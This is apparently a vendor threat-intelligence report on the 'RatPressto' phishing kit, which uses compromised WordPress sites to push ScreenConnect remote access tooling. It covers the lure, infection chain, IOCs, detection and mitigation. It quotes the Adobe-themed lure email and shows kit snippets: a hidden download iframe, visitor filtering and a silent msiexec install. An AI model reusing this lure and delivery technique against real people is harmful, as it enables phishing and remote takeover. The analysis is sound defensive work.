Fortra Intelligence and Research Experts (FIRE) have discovered an active phishing campaign leveraging a reusable Adobe-themed phishing kit deployed across multiple compromised WordPress websites. Threat actors have been using the kit to distribute remote access tooling, primarily ScreenConnect, through staged social engineering workflows designed to mimic legitimate Adobe Document Cloud delivery notifications.
FIRE have dubbed this phish kit RatPressto, because the kit is hosted on WordPress sites and pushes a screen-connect based remote access trojan (RAT) via a hidden iframe, as if by magic.
RatPressto has been observed targeting financial organizations, looking to silently exfiltrate credentials, secrets, and sensitive data that could be used to aid further compromise.
Analysis confirms that the phishing infrastructure is highly standardized across deployments. Multiple compromised websites were observed hosting byte-identical phishing pages with only victim-specific filenames modified between campaigns. The operation uses legitimate services such as GitHub for payload staging and ScreenConnect for remote access, significantly reducing detection rates by blending malicious activity into normal enterprise traffic.
A notable operational pattern identified during the investigation is that several compromised WordPress environments exposed administrative functionality publicly through accessible wp-admin interfaces. This strongly suggests weak administrative security practices or previously compromised administrator credentials were leveraged to deploy the phishing kit.
The RatPressto phishing kit operates as a two-stage delivery framework:
A fake Adobe document delivery confirmation page persuades the victim that a secure file has already been downloaded.
A hidden iframe silently downloads the payload in the background while the victim is instructed to open the file manually.
The campaign demonstrates a mature operational structure including:
Reusable phishing kit infrastructure
Victim-specific payload naming
Use of legitimate signed binaries
Self-hosted command-and-control infrastructure
Cloudflare telemetry integration
Multi-domain deployment capability
Social engineering customization based on target context
Infrastructure analysis and language indicators suggest likely Brazilian actor involvement with infrastructure linked to São Paulo.
Introduction
Fortra intelligence and research experts (FIRE) have identified a new private phishing kit being used to impersonate and target large corporations. The RatPressto phishkit was discovered in an investigation following the identification of several phishing emails impersonating legitimate or fake corporative emails.
The emails directed victims toward compromised WordPress websites hosting a staged phishing kit designed to deliver ScreenConnect-based remote access malware. The malware can be categorised as a remote access trojan (or RAT) and is primarily used to exfiltrate sensitive data that can aid further compromise, potentially operating as an infostealer.
Unlike traditional phishing campaigns that rely solely on malicious attachments, this operation uses a multi-stage web-based delivery framework hosted on legitimate but compromised websites. The threat actor combines social engineering, infrastructure reuse, and trusted enterprise software abuse to maximize infection success while minimizing detection.
The analysis focused on:
WordPress-hosted phishing kit deployments
HTML and PHP source code reuse
Infrastructure overlap
Payload delivery mechanisms
Command-and-control evolution
ScreenConnect abuse
GitHub staging infrastructure
Victim deception techniques
Operational fingerprints
The investigation identified several strong forensic indicators linking all deployments to a single private phishing kit.
First, lets go over the attack flow of the RatPressto kit, we’ll then take a deeper dive into some of the artifacts and indicators and what that can tell us about the active campaign.
Email Template Analysis
The phishing emails associated with this campaign follow a highly consistent and reusable template structure. Across multiple observed samples, the message body maintains nearly identical wording, with only minor variations in sender identity, branding, or embedded URLs.
A recurring characteristic is the use of a generic greeting:
“Hello,”
The body then immediately introduces a confidentiality-themed pretext designed to create urgency and legitimacy:
“For confidentiality and due to file size constraints, the project document has been uploaded to Adobe Document Cloud. Please use the link below to review it.”
This social engineering technique attempts to normalize the use of external download portals while discouraging scrutiny of the attachment or link source.
The email then presents a “VIEW FILE” button or hyperlink which redirects the victim to the phishing infrastructure. In most observed cases, the destination is a compromised WordPress website hosting the phishing kit; however, some deployments were observed on standalone PHP servers or non-WordPress infrastructure. Despite changes in hosting environments, the wording and structure of the lure remain consistent across deployments.
The template concludes with an additional trust-building statement:
“Please advise if there are any access issues.”
This sentence creates the false impression of an active communication channel or legitimate business interaction. However, no evidence was observed of follow-up communication from the actor after initial delivery.
Most samples terminate with a professional closing such as:
“Kind regards,”
The uniformity of the email structure across multiple campaigns strongly suggests the use of a standardized phishing kit or reusable Business Email Compromise (BEC) template framework.
Threat Landscape
Phishing operations increasingly rely on legitimate web infrastructure and signed software to bypass modern detection controls. Rather than deploying custom malware families, many actors now abuse legitimate remote administration tools such as:
ScreenConnect
ISL Online
Logmein
Tiflux
This campaign aligns with that broader trend but distinguishes itself through the operational maturity of its phishing kit.
The actor operates a reusable framework capable of rapid deployment across compromised WordPress sites. The phishing pages are visually convincing, professionally structured, and engineered to simulate Adobe document workflows.
A particularly important observation is that several of the compromised websites exposed accessible WordPress administrative interfaces (wp-admin). This indicates either:
Weak WordPress administration security
Credential theft against site administrators
Existing webshell persistence
Vulnerable plugins/themes enabling administrative compromise
The repeated exposure of wp-admin functionality across multiple compromised sites suggests that WordPress administrative compromise may be part of the actor’s operational workflow.
The campaign also demonstrates increasing operational sophistication through:
Migration from ScreenConnect cloud relays to self-hosted C2 infrastructure
GitHub-based payload hosting
Victim-specific lure customization
Multi-stage download orchestration
Cloudflare telemetry integration
Standardized reusable source code
Attribution Assessment
Confidence: Medium
Suspected Origin: Brazil
Indicator | Evidence |
Hosting Infrastructure | ampliawifi.com → 177.154.191.148 (São Paulo, BR) |
Nameserver | c3po3090.com.br – self-operated cPanel infrastructure |
Language Indicators | Portuguese infrastructure references and naming conventions |
Infrastructure Overlap | Shared hosting and deployment patterns |
TTP Alignment | Consistent with Brazilian phishing and BEC activity |
Infrastructure linked to the operation includes:
ampliawifi.com
gaheempreendimentos.com
c3po3090.com.br
cloud.zistopstoabetterlife.com
The actor appears to maintain both compromised victim infrastructure and actor-controlled infrastructure.
Infrastructure Overview
Actor Infrastructure
Hosting and DNS
177.154.191.148 – São Paulo, Brazil
HOSTGNOME-AS infrastructure
Self-managed cPanel/WHM services
Dovecot/Exim mail infrastructure
Actor-Controlled Domains
Domain | ampliawifi |
ampliawifi.com | WordPress deployment |
gaheempreendimentos.com | Cloudflare-protected deployment |
c3po3090.com.br | Nameserver infrastructure |
Compromised Sites Used as Payload Hosts
Domain | Iconclinic |
iconclinic.ae | WordPress site, wp-admin exposed |
kinorot.co.il | Likely compromised victim infrastructure |
vetcarebd.xyz | Payload delivery host |
nabellacouture.com | Payload delivery host |
birexo.icu | Additional phishing kit deployment |
abpmed.com | Additional phishing kit deployment |
Important Observation – Exposed WordPress Administration
The recovered infrastructure strongly indicates that the actor is abusing poorly secured WordPress environments to deploy the phishing kit.
Multiple sites exposed:
/wp-admin/
Administrative WordPress assets
Elementor management components
Public WordPress login functionality
This pattern is operationally significant because it suggests the actor either:
Compromised administrator credentials
Leveraged vulnerable plugins/themes
Uploaded phishing kit files directly through WordPress administrative panels
Maintains persistence through WordPress administrative access
The consistency of exposed administrative functionality across multiple unrelated victim sites strongly supports the theory that WordPress administrative compromise is part of the actor’s deployment workflow.
Additionally, the phishing kit files themselves (download.html, complete.php, download.php) appear deployed directly into WordPress-accessible directories, further reinforcing the likelihood of administrative-level access.
Several recovered deployments also included Elementor-related metadata and Yoast SEO remnants, confirming that the actor intentionally leaves the phishing kit embedded within otherwise legitimate WordPress content structures.
Phishing Kit Analysis
Newly Recovered HTML Samples
Additional recovered HTML samples provided during the investigation further confirm that the actor is operating a reusable and actively maintained phishing framework. The recovered pages contain the same operational patterns previously observed across the campaign, including:
Adobe-themed branding
Hidden iframe-based payload delivery
Reused JavaScript redirect logic
Shared CSS structures
Cloudflare telemetry beacons
Background image reuse
Victim-specific filename substitution
Silent payload download workflows
The recovered files also demonstrate that the phishing kit is continuing to evolve operationally.
New Operational Behaviors Identified
Anti-Analysis / Visitor Filtering
One recovered HTML file introduces basic anti-analysis and visitor filtering logic. The page performs:
Mobile device detection using User-Agent analysis
IP-based filtering against hardcoded IP addresses
Automatic redirection away from the phishing workflow
Blocked users are redirected to:
https://www.easternbank.com/
This behavior suggests the actor is attempting to reduce automated analysis visibility and prevent mobile-device execution.
Observed blocked IPs include:
162.158.63.162
162.158.63.161
162.158.63.160
The script retrieves the victim IP using:
https://api.ipify.org?format=json
This represents an escalation in operational maturity compared to the earlier kit versions.
Cloudflare Telemetry Expansion
The newly recovered samples contain an additional Cloudflare Insights beacon:
fcfd0b3135e24171980eef5488a4927b
This differs from previously observed Cloudflare telemetry tokens and suggests:
Multiple operational deployments
Potential infrastructure rotation
Separate tracking instances per campaign
Continued actor monitoring of victim interactions
Victim-Specific Payload Naming
Recovered payload references include:
CapraAssetManagementInc.vbs
ScreenConnect.ClientSetup.msi
This further supports the assessment that the actor customizes filenames to match the victim’s expected business context.
Hidden Iframe Persistence
The recovered HTML again confirms the continued use of hidden iframe delivery:
<iframe src="download.php" style="display:none;"></iframe>
This mechanism remains one of the most important forensic fingerprints of the phishing kit.
Shared Developer Artifacts
The additional HTML samples preserve the same developer artifacts identified previously:
Title: Background Image Page
Shared CSS classes
2000ms redirect delay
Adobe-themed assets
Reused loading logic
Byte-identical structure
These artifacts continue to provide strong attribution confidence linking the deployments to the same phishing kit family.
Phishing Kit Analysis
Shared Template Infrastructure
Analysis confirmed that all observed phishing pages were nearly byte-identical.
Shared elements include:
CSS classes: .info-text, .highlight, .spinner, .confirmationModal
Accent color: #1e4dbd
Adobe branding assets
Shared JavaScript workflow
Identical redirect timing logic
Hidden iframe delivery mechanism
The only consistent variation between deployments is the victim-specific filename used to disguise the payload.
This strongly indicates:
A centralized private phishing kit
Standardized deployment procedures
Single operator or tightly coordinated actor group
Stage 1 – Fake Adobe Delivery Page
Victims arriving at the phishing page are presented with:
Adobe-themed branding
“Download Complete” messaging
Fake secure document notification
Instructions to open a downloaded file
Simulated loading behavior
The page uses the JavaScript function:
submitForm()
This function:
Hides the download button
Displays a loading spinner
Redirects the victim after 2000ms
The delay has no technical purpose and exists purely for social engineering.
Stage 2 – Silent Download Trigger
The second-stage page silently triggers payload delivery using a hidden iframe:
<iframe src="download.php" style="display:none;"></iframe>
This mechanism downloads the payload automatically without requiring explicit user interaction.
The visible instructions shown to the victim are largely irrelevant because the payload download has already occurred in the background.
Forensic Fingerprints
Background Image Artifact
One of the strongest forensic indicators is the repeated use of the image:
Screenshot 2025-04-25 161700.png
This filename appears across all observed deployments.
The image is not a stock asset but appears to be a locally captured screenshot retained by the phishing kit author.
This creates a high-confidence attribution artifact.
Dead Code Artifact
All deployments contain an unused CSS class:
.highlight {
font-weight: bold;
color: #1e4dbd;
}
The class is never referenced by the HTML.
This dead code serves as an additional fingerprint linking deployments together.
Developer Artifact
Stage 1 pages use the title:
<title>Background Image Page</title>
This appears to be an accidental developer artifact left unchanged across deployments.
Stage 2 pages instead use:
<title>Adobe Plugin Required</title>
The inconsistency itself becomes a reusable forensic indicator.
Infection Chain
Stage 0 – Initial Access
Victims receive phishing emails impersonating Adobe Document Cloud notifications.
The email instructs victims to review a “secured document” hosted externally.
Stage 1 – Compromised WordPress Site
Victims are redirected to a phishing page hosted on a compromised WordPress website.
Stage 2 – Silent Payload Download
The phishing kit automatically downloads:
MSI payloads
EXE droppers
BAT scripts
ScreenConnect installers
Stage 3 – GitHub Loader
GitHub repositories associated with the actor host additional payloads.
Observed repositories:
creativebobo/ceoexe
creativebobo/ceo
Stage 4 – ScreenConnect Installation
The malware silently installs ScreenConnect components and establishes persistence.
Stage 5 – Command and Control
The infected system connects to:
cloud.zistopstoabetterlife.com:8041
This represents a migration away from standard ScreenConnect cloud relays toward self-hosted infrastructure.
Stage 6 – Actions on Objectives
ScreenConnect enables full remote control of the infected machine with the ability to modify, create or delete files, suggesting that the most likely action on objective is to exfiltrate sensitive data. Reconnaissance intelligence and credentials can be exfiltrated to support further compromise, or in less likely scenarios sensitive organizational data could be exfiltrated for extortion purposes.
Stealth and Evasion Techniques
Technique | Behavior | MITRE |
Obfuscation | Heavily obfuscated BAT dropper | T1140 |
Self-deletion | Payload cleanup after execution | T1070.004 |
Silent Installation | msiexec /qn /norestart | T1047 |
Hidden Execution | No visible UI/tray icon | T1564.003 |
Signed Binary Abuse | Legitimate ScreenConnect binaries | T1218 |
Masquerading | Victim-specific filenames | T1036 |
Remote Access Software Abuse | ScreenConnect | T1219 |
MITRE ATT&CK Mapping
Tactic | Technique | ID |
Initial Access | Spearphishing Attachment | T1566.001 |
Execution | User Execution | T1204.002 |
Execution | PowerShell | T1059.001 |
Defense Evasion | Deobfuscate/Decode Files | T1140 |
Defense Evasion | File Deletion | T1070.004 |
Defense Evasion | Hidden Execution | T1564.003 |
Defense Evasion | Masquerading | T1036 |
Persistence | Windows Service | T1543.003 |
Command and Control | Remote Access Software | T1219 |
Command and Control | Encrypted Channel | T1573 |
Indicators of Compromise (IOCs)
Domains
cloud.zistopstoabetterlife.com
iconclinic.ae
ampliawifi.com
gaheempreendimentos.com
vetcarebd.xyz
nabellacouture.com
birexo.icu
abpmed.com
c3po3090.com.br
Infrastructure
84.32.41.64
177.154.191.148
File Artifacts
ScreenConnect.ClientSetup.msi
microsoftceo.exe
ceo.msi
WordPress Paths
/wp-admin/
/download.html
/complete.php
/download.php
Detection Opportunities
WordPress Monitoring
Organizations should monitor for:
Unexpected /wp-admin/ exposure
Unauthorized PHP uploads
Unknown subdirectories under WordPress roots
Hidden iframe injections
Adobe-themed phishing pages
Newly created upload directories
Network Detection
Alert on:
ScreenConnect traffic to unknown infrastructure
TCP port 8041 outbound connections
GitHub raw file downloads from suspicious repositories
Endpoint Detection
Hunt for:
ScreenConnect Client services
msiexec launched from TEMP directories
PowerShell download cradle activity
Recently created MSI installers
Mitigation Guidance
Immediate Actions
Block known malicious infrastructure.
Audit WordPress deployments for exposed administrative interfaces.
Disable public access to wp-admin where possible.
Enforce MFA on all WordPress administrator accounts.
Hunt for ScreenConnect installations outside approved inventory.
Monitor GitHub raw download activity.
Review web server logs for suspicious upload activity.
Medium-Term Actions
Deploy WordPress hardening controls.
Restrict administrative access by IP.
Monitor for iframe injection patterns.
Audit plugins and themes.
Implement behavioral detection for LOLBin abuse.
Closing Notes
This campaign demonstrates the continued evolution of phishing operations toward highly reusable infrastructure and trusted software abuse.
The phishing kit identified during this investigation is operationally mature, reusable, and specifically engineered to maximize victim trust while minimizing detection.
The most significant findings include:
Reusable byte-identical phishing kit deployments
Abuse of compromised WordPress infrastructure
Publicly exposed wp-admin interfaces
Hidden iframe-based payload delivery
Victim-specific lure customization
Migration to self-hosted ScreenConnect infrastructure
GitHub-based staging operations
The repeated exposure of WordPress administrative interfaces across compromised websites strongly suggests that insecure or previously compromised WordPress environments play a central role in the actor’s deployment strategy.
Organizations operating WordPress infrastructure should treat exposed wp-admin functionality as a high-risk condition requiring immediate review.
The actor remains active, and additional deployments should be expected.
References
MITRE ATT&CK – T1219 Remote Access Software
MITRE ATT&CK – T1566.001 Spearphishing Attachment
ConnectWise ScreenConnect Documentation
WordPress Security Hardening Guide
ANY.RUN analysis artifacts
